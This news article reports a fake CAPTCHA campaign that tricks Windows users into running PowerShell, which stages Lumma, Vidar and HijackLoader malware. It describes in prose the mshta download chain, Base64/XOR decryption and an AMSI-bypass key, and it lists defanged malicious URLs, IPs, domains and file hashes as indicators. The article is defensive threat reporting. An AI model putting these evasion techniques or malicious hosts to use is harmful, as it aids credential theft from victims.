Cyber Security News

Fake CAPTCHA Malware Exploits Windows Users to Run PowerShell Commands

In early February 2025, Trustwave SpiderLabs uncovered a resurgence of a malicious campaign leveraging fake CAPTCHA verifications to deliver malware.

This campaign uses deceptive CAPTCHA prompts to trick users into executing PowerShell commands, initiating a multi-stage attack chain.

The end goal is to deploy infostealer malware such as Lumma and Vidar, which exfiltrate sensitive data and maintain persistence on infected systems.

The attack begins when users encounter a fake CAPTCHA on compromised websites. Instead of verifying the user’s identity, the CAPTCHA prompts the execution of a PowerShell script.

This script invokes additional malicious payloads through a series of steps, including downloading and decrypting further scripts, eventually leading to the deployment of infostealers.

Technical Breakdown of the Attack Chain

The attack chain comprises several stages in which attackers use a deceptive fake CAPTCHA prompt to trick users into executing a malicious PowerShell command, making it appear as a legitimate part of the verification process.

This command leverages mshta to retrieve and execute a remote HTA file, which in turn launches another PowerShell script.

Malicious PowerShell Execution Command.

The script then decrypts additional commands, enabling a multi-stage execution process.

Ultimately, this leads to the deployment of infostealer malware, such as Lumma and Vidar, designed to extract credentials and other sensitive data from the victim’s system.

Step-by-Step Execution.

The payloads are designed to bypass detection through obfuscation techniques, including large file sizes to evade sandbox analysis.

The decryption process involves multiple layers of Base64 decoding and XOR operations, dynamically retrieving malicious URLs and executing staged scripts.

Multi-Stage PowerShell Decryption

This attack uses layered PowerShell execution to evade detection and deploy malware. The decrypted PowerShell command contains a Base64-encoded payload, which, when decoded, reveals another script responsible for executing additional commands or downloading further payloads.

Multi-Stage PowerShell Decryption.

A key technique involves leveraging the .NET Marshal class to decrypt SecureString data, allowing sensitive operations to remain undetected.

The script then bypasses execution policies and fetches a malicious URL using Net.WebClient, downloading and running the payload while obfuscating command names to evade security tools.

The staged PowerShell script is hosted on different servers per campaign, such as https://60d427489[.]kliplubuziy[.]shop/e290ec7eeb84ea465f4d2e1441fec32d[.]stage. The attackers use large script files to bypass security analysis restrictions.

Decryption relies on an XOR key, stored in a variable ($GZluzrkhPzWWrrywFFx), which is converted to a byte array and applied to the Base64-decoded payload. The final script is then executed.

Notably, the XOR key in some campaigns resolves to AMSI_RESULT_NOT_DETECTED, enabling the malware to bypass AMSI protections. Variants of the attack also use the key in decimal form to further evade detection.

Final Payload and Defense Evasion Tactics

The final stage of the attack delivers Lumma Stealer and Vidar Stealer, which extract sensitive data from infected systems.

Additionally, the campaign deploys a Golang-based backdoor called HijackLoader through a malicious software package disguised as “TiVo Desktop.”

This package, approximately 700MB in size, likely aims to evade antivirus detection by inflating its size.

Trustwave’s investigation also revealed that these campaigns use unique staging sites for each iteration of the attack.

The attackers employ advanced defense evasion tactics such as disabling event logging, renaming system utilities, and hiding execution windows.

Trustwave continues to monitor this evolving threat through its Advanced Continual Threat Hunt (ACTH) methodology.

Organizations are advised to remain vigilant against deceptive CAPTCHA prompts and implement robust security measures to detect and mitigate such sophisticated attacks.

IOC (Indicators of Compromise)

CategoryIndicator
Lumma Stealer322579b54e4c6fecabeee9cdb75233d8
Lumma Stealerd67ee7ae28a09bf7f6d33118a9d07527
Vidar Stealer17190c7e5163b5c115e3d470f568ee5f
HijackLoader218261DAA1AEBD5484B29BF7F959B57A
IP Addresses188[.]114[.]97[.]3
IP Addresses185[.]195[.]97[.]57
IP Addresses191[.]101[.]230[.]18
IP Addresses172[.]67[.]149[.]66
URLshxxps[://]t[.]me/m08mbk
URLshxxps[://]wirybringero[.]shop/api
URLshxxps[://]farmagrupodw[.]com/temp/Elated[.]exe
URLshxxps[://]www[.]suarakutim[.]com/temp/wspconfig[.]rpm
URLshxxps[://]www[.]suarakutim[.]com/temp/hosebird[.]rpm
URLshxxps[://]steamcommunity[.]com/profiles/76561199724331900
URLshxxps[://]steamcommunity[.]com/profiles/76561199820567237
Domainscryptocurrencytrends[.]click
Domainsguardeduppe[.]com
Domainstoppyneedus[.]biz

Find this News Interesting! Follow us on Google NewsLinkedIn, and X to Get Instant Updates!

Kaaviya

Kaaviya is a Security Editor and fellow reporter with Cyber Security News. She is covering various cyber security incidents happening in the Cyber Space.

Recent Posts

Cisco IOS, XE, and XR Vulnerability Allows Remote Device Reboots

 Cisco has issued an urgent security advisory (cisco-sa-twamp-kV4FHugn) warning of a critical vulnerability in its…

26 minutes ago

OpenCTI: Free Cyber Threat Intelligence Platform for Security Experts

OpenCTI (Open Cyber Threat Intelligence) stands out as a free, open source platform specifically designed…

1 hour ago

LockBit Ransomware Group Breached: Internal Chats and Data Leaked Online

The notorious LockBit ransomware group, once considered one of the world’s most prolific cyber extortion…

4 hours ago

Cisco IOS XE Wireless Controllers Vulnerability Lets Attackers Seize Full Control

A critical security flaw has been discovered in Cisco IOS XE Wireless LAN Controllers (WLCs),…

4 hours ago

Top Ransomware Groups Target Financial Sector, 406 Incidents Revealed

Flashpoint analysts have reported that between April 2024 and April 2025, the financial sector emerged…

19 hours ago

Agenda Ransomware Group Enhances Tactics with SmokeLoader and NETXLOADER

The Agenda ransomware group, also known as Qilin, has been reported to intensify its attacks…

19 hours ago